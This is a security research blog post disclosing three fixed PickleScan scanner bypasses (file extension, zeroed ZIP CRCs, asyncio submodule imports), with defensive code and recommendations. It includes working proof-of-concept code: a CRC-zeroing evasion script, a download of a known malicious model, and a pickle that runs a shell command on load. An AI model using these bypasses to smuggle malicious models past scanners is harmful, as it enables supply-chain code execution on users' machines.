PyTorch Users at Risk: Unveiling 3 Zero-Day PickleScan Vulnerabilities

AI Model Scanning as the First Layer of Security

JFrog Security Research found three critical zero-day vulnerabilities in PickleScan that allow attackers to bypass the most popular scanning tool for pickle-based models. PickleScan is a widely used, industry-standard tool for scanning ML models and ensuring they contain no malicious content. Each vulnerability lets attackers evade PickleScan’s malware detection and potentially carry out a large-scale supply chain attack by distributing ML models that hide malicious code. In this blog post, we explain how PickleScan works and why, given these newly discovered zero-day vulnerabilities, loading pickle models remains unsafe even when a model scanning tool is in place.

A special thanks to mmaitre314, the PickleScan inventor, for resolving the vulnerabilities with us in a timely manner.

What Makes PyTorch Models a Security Nightmare?

PyTorch is a popular Python library for training machine learning models, with over 200,000 publicly available models hosted on Hugging Face. While PyTorch is a great ML library, by default it saves and loads models using Python’s infamous “pickle” serialization format.

Pickle is a flexible serialization format, designed to reconstruct any Python object. However, this flexibility comes with a significant security risk: Pickle files can embed and execute arbitrary Python code during deserialization. Loading an untrusted PyTorch model means executing arbitrary code that could perform malicious actions on your system, such as exfiltrating sensitive data or installing backdoors.
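To make this concrete, here is a minimal, harmless sketch that uses only the standard library. Pickle’s `__reduce__` hook lets an object tell the unpickler which callable to invoke, and with which arguments, when the object is rebuilt. The class name `Harmless` and the use of the builtin `len` are illustrative stand-ins for a real payload such as a call to `os.system`.

```python
import pickle
import pickletools


class Harmless:
    """Stand-in for a malicious object.

    __reduce__ returns (callable, args); pickle.loads() calls callable(*args)
    to rebuild the object. An attacker would return something like
    (os.system, ("<command>",)); this sketch uses the harmless builtin len.
    """

    def __reduce__(self):
        return (len, ("arbitrary code ran",))


payload = pickle.dumps(Harmless())   # only records a reference to builtins.len
pickletools.dis(payload)             # lists the opcodes, including STACK_GLOBAL and REDUCE
result = pickle.loads(payload)       # calls len("arbitrary code ran") while loading
print(result)                        # → 18, not a Harmless instance
```

Note that `pickle.loads` returned the result of the call rather than an instance of the original class: the author of the file, not the code loading it, decided what ran.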

The impact on security is immense. A bad actor could create a seemingly harmless model file that, when loaded, deploys a complex attack payload. This isn’t a hypothetical threat; it’s a very real danger in an environment where sharing models on platforms like Hugging Face is standard practice. The first malicious model we found on Hugging Face is described in one of our previous blog posts.

Safer serialization formats, such as Safetensors, already exist and do not allow arbitrary code execution. However, the rapid pace of AI development often leads data scientists to prioritize speed over security. Consequently, many companies still use the unsafe pickle format and must therefore take proactive measures to protect their systems from malicious pickle models.

How Does the Industry Currently Address This Security Gap?

Recognized as the industry standard, PickleScan is the leading open-source tool for scanning pickle-based models. PickleScan operates by parsing pickle bytecode to detect and flag potentially dangerous operations, such as suspicious imports or function calls, before they can be executed.

PickleScan’s scanning process relies on several core components:

- Bytecode Analysis: Meticulous examination of pickle files at the bytecode level, pinpointing individual operations and their potential security ramifications.

- Blacklist Matching: Cross-referencing results against a blacklist of hazardous imports and operations, flagging any matches discovered during analysis.

- Multi-format Support: Support for various PyTorch formats, such as ZIP archives, and other common packaging methods.
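The first two components can be sketched with the standard library’s `pickletools` module, which walks a pickle’s opcodes without executing them. This is an illustrative approximation, not PickleScan’s actual code: `list_globals` collects the (module, name) pairs that the `GLOBAL`/`INST` opcodes (protocols 0 to 3) and `STACK_GLOBAL` (protocol 4 and later) would import, and `is_dangerous` checks them against a tiny, hypothetical `UNSAFE_GLOBALS` deny-list. The memo handling is approximate (repeated module names are often fetched back with `BINGET`) and would need hardening for adversarial input.

```python
import os
import pickle
import pickletools

# Hypothetical, heavily abbreviated deny-list for illustration only.
UNSAFE_GLOBALS = {
    "os": "*",
    "posix": "*",        # os.system is pickled as posix.system on Linux/macOS
    "nt": "*",           # ...and as nt.system on Windows
    "subprocess": "*",
    "builtins": {"eval", "exec", "compile", "__import__", "getattr"},
}
MEMO_PUTS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}
MEMO_GETS = {"GET", "BINGET", "LONG_BINGET"}


def list_globals(data: bytes) -> set:
    """Return the (module, name) pairs a pickle would import, without loading it."""
    ops = list(pickletools.genops(data))
    memo = {}
    found = set()
    for i, (op, arg, _pos) in enumerate(ops):
        if op.name in ("GLOBAL", "INST"):
            # Protocols 0-3 encode the import inline as "module name".
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif op.name in MEMO_PUTS:
            # Approximation: remember the argument of the opcode that pushed the value.
            key = len(memo) if op.name == "MEMOIZE" else arg
            memo[key] = ops[i - 1][1] if i else None
        elif op.name == "STACK_GLOBAL":
            # Protocol 4+ takes module and name from the two preceding string
            # pushes, which may be literals or BINGETs of memoized strings.
            values = []
            j = i - 1
            while len(values) < 2 and j >= 0:
                prev, prev_arg, _ = ops[j]
                if prev.name in MEMO_GETS:
                    values.append(memo.get(prev_arg))
                elif prev.name not in MEMO_PUTS:
                    values.append(prev_arg)
                j -= 1
            if len(values) == 2:
                name, module = values          # collected newest-first
                found.add((str(module), str(name)))
    return found


def is_dangerous(module: str, name: str) -> bool:
    rule = UNSAFE_GLOBALS.get(module)
    return rule == "*" or (isinstance(rule, set) and name in rule)


class Payload:
    def __reduce__(self):
        # Pickling only stores a reference to os.system; nothing runs here.
        return (os.system, ("echo pwned",))


for protocol in (2, pickle.DEFAULT_PROTOCOL):
    data = pickle.dumps(Payload(), protocol=protocol)
    for module, name in sorted(list_globals(data)):
        verdict = "DANGEROUS" if is_dangerous(module, name) else "not on deny-list"
        print(f"protocol {protocol}: {module}.{name} -> {verdict}")
```

Because `os.system` is recorded under its platform module name, a deny-list has to cover `posix` and `nt` as well as `os`; small naming details like this are exactly where scanners and loaders can drift apart.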

In addition to these components, PickleScan’s efficacy hinges on a crucial premise: It must interpret files precisely as PyTorch would. Any divergence in how PickleScan parses a model file versus how PyTorch loads the model presents a potential security vulnerability, allowing malicious payloads to bypass detection.

What challenges does PickleScan’s approach face?

PickleScan’s reliance on blacklist-based detection presents both advantages and limitations. While blacklists can effectively catch known dangerous patterns, they inherently cannot detect new attack vectors. The approach assumes that security researchers can anticipate and catalog every possible malicious behavior, a very challenging proposition given the ever-expanding attack surface and growing attack complexity that AI security professionals must address. That’s why at JFrog, our research team constantly upgrades our detection techniques to find new attack vectors as quickly as possible.

The pros and cons of blacklisting and whitelisting ML models

Some security experts advocate for whitelist-based approaches, which would only allow explicitly approved operations. However, overly restrictive whitelists can:

- Slow down development workflows

- Lead to missed release deadlines

- Encourage developers to bypass or disable security controls
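The trade-off can be illustrated with two toy policies applied to the same sets of imports. Both tables are hypothetical and deliberately tiny; the PyTorch entries are globals that commonly appear in `torch.save` checkpoints, and `my_project.layers.FancyNorm` is a made-up stand-in for a benign custom class.

```python
# Hypothetical policy tables, kept tiny for illustration.
DENY = {("posix", "system"), ("builtins", "eval"), ("subprocess", "Popen")}
ALLOW = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
}


def deny_list_verdict(imports: set) -> str:
    """Block only known-bad imports; anything unrecognized is allowed."""
    return "block" if imports & DENY else "allow"


def allow_list_verdict(imports: set) -> str:
    """Allow only approved imports; anything unrecognized is blocked."""
    return "allow" if imports <= ALLOW else "block"


cases = {
    "plain checkpoint": {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2")},
    "unlisted gadget": {("asyncio.unix_events", "_UnixSubprocessTransport._start")},
    "custom layer": {("collections", "OrderedDict"), ("my_project.layers", "FancyNorm")},
}
for label, imports in cases.items():
    print(f"{label:16} deny-list: {deny_list_verdict(imports):5} "
          f"allow-list: {allow_list_verdict(imports)}")
```

The deny-list lets the unfamiliar gadget through, while the allow-list blocks a legitimate custom layer until someone approves it, which is the development friction described in the list above.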

At JFrog, we believe that a well-maintained blacklist, backed by a dedicated security research team, strikes the right balance between security and development efficiency. Our continuous, in-depth security research ensures that emerging threats are quickly identified and incorporated into our detection capabilities, providing maximum protection for our customers.

Who Actually Depends on PickleScan for Security?

PickleScan’s importance in the AI security ecosystem cannot be overstated. The tool has been adopted by numerous high-profile organizations and platforms.



For example, Hugging Face, the world’s largest repository of AI models, relies heavily on PickleScan to scan the millions of models uploaded to its platform. This integration provides a crucial safety net for the AI community, helping to prevent the distribution of malicious models through one of the most popular model-sharing platforms.

This widespread adoption has made PickleScan a critical pillar of the AI security infrastructure, with many organizations depending on it as their primary defense against pickle-based attacks.

The tool’s open-source nature has contributed to its popularity, allowing organizations to integrate it into their own security pipelines and customize it for their specific needs. However, this widespread adoption also means that vulnerabilities in PickleScan have far-reaching implications across the entire AI ecosystem.

What Did Our Security Research Uncover?

We identified three critical vulnerabilities in PickleScan that could allow malicious actors to bypass its security scanning entirely, causing the tool to report scanned model files as safe when they may actually contain malicious code.





Vulnerability 1: CVE-2025-10155 – File Extension Bypass

CVSS: 9.3 (Critical)

Our first discovery reveals a fundamental flaw in PickleScan’s file type detection logic. The scanner can be completely bypassed when it is given a standard pickle file with a PyTorch-related extension such as .bin or .pt.

How Does This Attack Work?

The vulnerability exists in the scan_bytes function within picklescan/scanner.py. The code prioritizes file extension checks over content analysis, leading to a critical logical flaw:

- An attacker takes a malicious pickle file and changes its extension (e.g., .pkl) to a PyTorch extension that is “seemingly incorrect” for a plain pickle (e.g., .bin).

- When scanning the file, PickleScan attempts to parse it using PyTorch-specific scanning logic.

- The PyTorch scanner fails, because the file is a standard pickle file rather than a PyTorch archive, and returns an error.

- The malicious content goes undetected.

- When the pickle file is loaded with PyTorch (e.g., torch.load), the model loads successfully, because PyTorch identifies the file type by its contents, not its extension.
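The core mismatch is “route by name” versus “route by content”. In the sketch below, `route_by_extension` is a hypothetical simplification of the flawed pattern (not PickleScan’s actual `scan_bytes` code), and `route_by_content` decides from the leading bytes: ZIP archives start with `PK\x03\x04`, and pickles of protocol 2 or later start with the `PROTO` opcode byte `0x80`.

```python
import io
import pickle
import zipfile

ZIP_MAGIC = b"PK\x03\x04"   # ZIP local file header signature
PROTO_OPCODE = b"\x80"       # first byte of every protocol 2+ pickle


def route_by_extension(filename: str) -> str:
    """The flawed pattern (hypothetical simplification): trust the file name."""
    return "pytorch" if filename.endswith((".bin", ".pt", ".pth")) else "pickle"


def route_by_content(data: bytes) -> str:
    """Decide from the leading bytes, as a content-sniffing loader would."""
    if data.startswith(ZIP_MAGIC):
        return "pytorch-zip"
    if data.startswith(PROTO_OPCODE):
        return "pickle"
    return "unknown"   # e.g. protocol 0/1 pickles, which have no header byte


# A plain pickle that an attacker has simply renamed to model.bin.
renamed = pickle.dumps({"weights": [0.1, 0.2]})
print(route_by_extension("model.bin"), route_by_content(renamed))

# A genuine ZIP archive, like the format torch.save() writes by default.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("archive/data.pkl", renamed)
print(route_by_content(buf.getvalue()))
```

A scanner that routes on content (and treats “unknown” as a reason to scan with every parser, or to reject) cannot be steered into the wrong code path just by renaming a file.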

Proof of Concept

We demonstrated this vulnerability by renaming a known malicious pickle file.

What’s the Real-World Impact?

This vulnerability allows attackers to disguise malicious pickle payloads within files using common PyTorch extensions. The malicious code would execute when loaded by PyTorch, but would completely bypass PickleScan’s detection mechanisms. Attackers can exploit it to publish malicious models while avoiding detection by PickleScan.

Vulnerability 2: CVE-2025-10156 – CRC Bypass in ZIP Archives

CVSS: 9.3 (Critical)

Our second discovery reveals that PickleScan’s ZIP archive scanning can be completely disabled by introducing CRC (Cyclic Redundancy Check) errors into the archive. This creates a significant blind spot where malicious models can be hidden.

Why Do CRC Errors Break Security Scanning?

PickleScan uses Python’s built-in zipfile module to handle ZIP archives. When the module encounters files with CRC mismatches, it raises exceptions that cause PickleScan to fail entirely. However, PyTorch’s model loading often bypasses CRC checks, creating a dangerous discrepancy.

The problem: a mismatch between PickleScan and PyTorch

- PickleScan fails completely when encountering bad CRC values

- PyTorch still loads models from archives with CRC errors
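The zipfile behavior can be reproduced in a few lines. This sketch builds a small in-memory archive (a stand-in for a model file, with a made-up member name), zeroes the CRC-32 field of each central directory header, and shows that Python’s `zipfile` still opens the archive but refuses to hand back the member’s contents.

```python
import io
import zipfile

CENTRAL_SIG = b"PK\x01\x02"   # central directory file header signature
CRC_OFFSET = 16               # CRC-32 field offset within that header

# Build a small in-memory archive standing in for a model file.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("archive/data.pkl", b"pretend these are pickle bytes")
raw = bytearray(buf.getvalue())

# Zero every central-directory CRC, the same idea as the drop_crc.py script.
pos = raw.find(CENTRAL_SIG)
while pos != -1:
    raw[pos + CRC_OFFSET : pos + CRC_OFFSET + 4] = bytes(4)
    pos = raw.find(CENTRAL_SIG, pos + 4)

with zipfile.ZipFile(io.BytesIO(bytes(raw))) as zf:
    names = zf.namelist()            # the archive still opens and lists its member
    bad_member = zf.testzip()        # name of the first member that fails its CRC check
    try:
        zf.read("archive/data.pkl")
        read_error = None
    except zipfile.BadZipFile as exc:  # raised once the computed CRC disagrees
        read_error = exc

print(names, bad_member, repr(read_error))
```

A scanner built on `zipfile` therefore never sees the pickle bytes unless it deliberately handles this exception, while a loader that skips CRC verification reads them normally.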

Proof of Concept

Crafting a PyTorch model archive with zeroed CRCs to bypass PickleScan

```python
#!/usr/bin/env python3
# drop_crc.py
# Overwrites the 4-byte CRC field in every Central Directory header with zeros.
import os
import shutil
import sys

CENTRAL_SIG = b'PK\x01\x02'  # central directory file header signature
CRC_OFFSET_IN_CENTRAL = 16   # CRC-32 starts 16 bytes after the signature


def zero_central_crcs(path):
    with open(path, 'r+b') as f:
        data = f.read()
        i = 0
        matches = 0
        while True:
            # Naive scan: every occurrence of the signature is treated as a header.
            i = data.find(CENTRAL_SIG, i)
            if i == -1:
                break
            # write zeros into the CRC field
            f.seek(i + CRC_OFFSET_IN_CENTRAL)
            f.write(b'\x00\x00\x00\x00')
            matches += 1
            i += 4
    return matches


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("Usage: python3 drop_crc.py path/to/archive.zip")
        sys.exit(2)
    path = sys.argv[1]
    if not os.path.isfile(path):
        print("File not found:", path)
        sys.exit(1)
    # Keep an untouched copy, since the archive is modified in place.
    print("Backing up original to", path + '.bak')
    shutil.copy2(path, path + '.bak')
    n = zero_central_crcs(path)
    print(f"Done — overwrote {n} central directory CRC fields.")
```

Python code that zeroes out the CRC fields in a ZIP archive’s central directory

Now let’s use it on a known malicious model:

```console
$ wget -O pytorch_model.bin "https://huggingface.co/MustEr/gpt2-elite/resolve/main/pytorch_model.bin?download=true"
$ python3 drop_crc.py pytorch_model.bin
Backing up original to pytorch_model.bin.bak
Done — overwrote 33 central directory CRC fields.
```

Then let’s use a simple script to get the PickleScan results:

```python
#!/usr/bin/env python3
# scan_pickle.py
import os
import sys

from picklescan.scanner import scan_file_path


def main():
    if len(sys.argv) != 2:
        print("Usage: python3 scan_pickle.py <path>")
        sys.exit(1)
    path = sys.argv[1]
    if not os.path.isfile(path):
        print(f"Error: file not found: {path}")
        sys.exit(1)

    result = scan_file_path(path)
    if result.scan_err:
        # The scan did not complete, so there is no verdict to report.
        print(f"[!] Error scanning {path}")
        sys.exit(1)

    print(result)
    print(f"Scan result for: {path}")
    print("----------------------------------------")
    print(f"Infected files: {result.infected_files}")
    print(f"Scanned files: {result.scanned_files}")
    print("----------------------------------------")
    if result.infected_files > 0:
        print("[!] Suspicious pickle detected!")
    else:
        print("[+] File appears safe.")


if __name__ == "__main__":
    main()
```

Python script that uses PickleScan as a library to scan a pickle file

When the CRC check fails, PickleScan errors out instead of returning scan results. This is dangerous because PyTorch processes the archive even when the CRC check fails: PyTorch’s CMake configuration passes the -DMINIZ_DISABLE_ZIP_READER_CRC32_CHECKS option by default in every build, so its bundled miniz ZIP reader skips CRC-32 verification.

How Could Attackers Exploit This?

Attackers can intentionally introduce CRC errors into ZIP archives containing malicious models. PickleScan will fail to analyze these archives, while PyTorch can still load and execute the malicious content.

As a result, attackers can easily upload malicious models that PickleScan never manages to analyze.

Vulnerability 3: CVE-2025-10157 – Bypassing Unsafe Globals Check with Subclass Imports

CVSS: 9.3 (Critical)

Our third discovery reveals that PickleScan’s unsafe globals check can be completely bypassed by using subclasses of dangerous imports instead of the exact module names. This allows attackers to circumvent the check and inject malicious payloads, leading to potential arbitrary code execution.

How Does This Attack Work?

The vulnerability stems from PickleScan’s strict, exact-match comparison of full module names against its list of unsafe globals, the imports that a pickle file instructs Python to load and execute during deserialization. If a malicious actor reaches a dangerous import through a subclass or submodule (for example, `asyncio.unix_events` rather than `asyncio`) instead of the exact listed module name, PickleScan fails to recognize it as critical and labels it “Suspicious” instead of “Dangerous.”
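The difference between an exact lookup and one that also considers parent packages fits in a few lines. The table and function names below are hypothetical; they illustrate the class of bug and one way to close it, not PickleScan’s actual code or the exact fix shipped in 0.0.31.

```python
# Hypothetical deny-list entries; PickleScan's real table and its fix may differ.
UNSAFE_MODULES = {"asyncio": "*", "subprocess": "*"}


def flagged_exact(module: str) -> bool:
    """Flawed pattern: only the exact module string is looked up."""
    return module in UNSAFE_MODULES


def flagged_with_parents(module: str) -> bool:
    """Also check every parent package, so asyncio.unix_events matches asyncio."""
    parts = module.split(".")
    return any(".".join(parts[:i]) in UNSAFE_MODULES for i in range(1, len(parts) + 1))


# The module recorded for the gadget used in this section's proof of concept.
module = "asyncio.unix_events"
print(flagged_exact(module), flagged_with_parents(module))   # → False True
```

Splitting on dots, rather than using a plain string prefix test, avoids falsely matching an unrelated module whose name merely starts with the same characters (for example, a hypothetical `asyncio_helpers`).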



Proof of Concept

We demonstrated this vulnerability using a model that utilizes the `asyncio` package:

```python
import pickle

# WARNING: the resulting file runs a shell command when unpickled. Unix-only,
# since asyncio.unix_events does not exist on Windows.


class MaliciousPickle:
    def __reduce__(self):
        from asyncio.unix_events import _UnixSubprocessTransport
        from asyncio.base_subprocess import BaseSubprocessTransport
        return (
            _UnixSubprocessTransport._start,
            (BaseSubprocessTransport, 'touch /tmp/success', True, -1, -1, -1, 100)
        )


with open('asyncio_asyncio_unix_events___UnixSubprocessTransport__start.pkl', 'wb') as f:
    pickle.dump(MaliciousPickle(), f)
```

Example code that uses an internal class of the asyncio package to execute arbitrary code

Let’s use PickleScan to test if it detects this malicious import. Since asyncio is blacklisted by PickleScan, it should flag this pickle file as dangerous.

Asyncio is blacklisted because it’s a library that can create and manage subprocesses, which means it has the inherent capability to execute arbitrary system commands. This makes it a security risk when used in pickle deserialization attacks.

Proof of Concept – how a submodule import makes detection fail

Expected Result: PickleScan should identify all `asyncio` imports as dangerous and flag the pickle file as malicious, as `asyncio` is in the `_unsafe_globals` dictionary.

Actual Result: PickleScan marked the import as Suspicious, failing to recognize it as critical and flag it as Dangerous.

What’s the Real-World Impact?

Attackers can craft malicious PyTorch models containing embedded pickle payloads and bypass the PickleScan check by using subclasses of dangerous imports. This could lead to arbitrary code execution on the user’s system when these malicious files are processed or loaded.

What Do These Vulnerabilities Tell Us About AI Security?

These vulnerabilities in PickleScan represent more than just technical flaws – they highlight systemic issues in how we approach AI security. Key pain points to address include:

Single Point of Failure – The widespread reliance on PickleScan creates a single point of failure for AI model scanning across the ecosystem. When the tool fails, entire security architectures become vulnerable.

Assumption Validation – These vulnerabilities demonstrate the danger of assuming that security tools and target applications handle files identically. The discrepancies between how PickleScan and PyTorch process files create exploitable security gaps.

Supply Chain Risk – With AI repositories hosting millions of models, these vulnerabilities could enable large-scale supply chain attacks affecting countless organizations.

How Should Organizations Respond to These Findings?

Based on our research, we recommend the following security measures:

For PickleScan Users:

- Update PickleScan to version 0.0.31 or later. Following our disclosure, the PickleScan maintainers fixed all of the above issues in version 0.0.31.

- Implement Layered Defense: Don’t rely solely on PickleScan for model security. Add multiple layers of protection, such as:

  - Sandboxing, to isolate model loading

  - A secure model repository proxy like JFrog Artifactory and JFrog Curation, providing another layer of protection for models that a simple scanner does not catch.
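To verify the upgrade, a check along these lines could run in CI. It assumes PickleScan is installed under its PyPI distribution name `picklescan`; `parse_release` and `picklescan_is_patched` are hypothetical helper names, and the version parsing only looks at the leading major.minor.patch numbers.

```python
import re
from importlib.metadata import PackageNotFoundError, version

MIN_PATCHED = (0, 0, 31)  # first release with the fixes, per the disclosure timeline


def parse_release(text: str) -> tuple:
    """Extract the leading major.minor.patch numbers from a version string."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"unrecognized version: {text!r}")
    return tuple(int(part) for part in match.groups())


def picklescan_is_patched() -> bool:
    try:
        installed = version("picklescan")
    except PackageNotFoundError:
        return False  # not installed at all
    return parse_release(installed) >= MIN_PATCHED


print(picklescan_is_patched())
```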

For Organizations:

- Move to safer ML model formats. Restrict usage of unsafe ML model types such as Pickle and Keras, and work only with safe model formats such as Safetensors.

- Use a secure model repository proxy like JFrog Artifactory and Curation, providing another layer of protection for models, especially for the new attack techniques used by attackers.

- Run automated scans and remove failed models. If an automated model security scan, such as one based on PickleScan, fails for any reason, immediately remove the scanned model and prevent its distribution inside the organization.
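A minimal sketch of this fail-closed policy follows. `ScanOutcome` and `admit_model` are hypothetical names; the two fields mirror the `scan_err` and `infected_files` attributes read by the PickleScan script earlier in this post, so PickleScan’s `scan_file_path` could plausibly be passed in as `scan`, but here the gate is exercised only with stand-in scanners.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class ScanOutcome:
    """Hypothetical stand-in for a scanner result."""
    scan_err: bool = False
    infected_files: int = 0


def admit_model(path: str, scan: Callable[[str], ScanOutcome]) -> bool:
    """Fail closed: admit a model only if the scan completed AND found nothing."""
    try:
        result = scan(path)
    except Exception:
        return False            # scanner crashed (e.g. on a corrupted ZIP): reject
    if result.scan_err:
        return False            # scanner reported an error: reject
    return result.infected_files == 0


def crashing_scanner(path: str) -> ScanOutcome:
    raise RuntimeError("Bad CRC-32")


print(admit_model("model.bin", lambda p: ScanOutcome()))               # True
print(admit_model("model.bin", lambda p: ScanOutcome(scan_err=True)))  # False
print(admit_model("model.bin", crashing_scanner))                      # False
```

The important design choice is that “no verdict” is treated the same as “malicious”: a scanner error like the CRC bypass then blocks the model instead of silently letting it through.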

How Does JFrog Address These Security Challenges?

At JFrog, we’ve learned from these vulnerabilities to build a more robust AI model scanning infrastructure. Our approach goes beyond simple blacklist matching to provide comprehensive protection at every stage of the AI development workflow.



JFrog Catalog provides precise information about the model and the evidence found inside it

The JFrog Platform provides these advantages for securing AI/ML development environments:

- Continuous Research: Our dedicated security research team continuously identifies and addresses emerging threats in the AI space, ensuring the JFrog Catalog covers the latest malicious AI models.

- Multi-layered Analysis: We combine static analysis, dynamic analysis, and behavioral monitoring to catch threats that single-point solutions miss.

- Integrated Platform: The JFrog Platform provides MLOps security integrated seamlessly with existing DevOps and DevSecOps workflows, providing security without sacrificing velocity.

- Hugging Face Integration: JFrog offers malicious model scanning for all ML models hosted on Hugging Face, directly accessible from the Hugging Face platform.

Vulnerability disclosure timeline:

- June 29, 2025: Vulnerabilities reported to PickleScan maintainers.

- September 2, 2025: Vulnerabilities fixed in PickleScan version 0.0.31.

The JFrog Security Research Team is dedicated to improving security across the software supply chain, including AI and ML pipelines. For more information about our security research or to report potential vulnerabilities, please contact us at security@jfrog.com. Stay on top of this and the latest application security risks by bookmarking JFrog Security Research.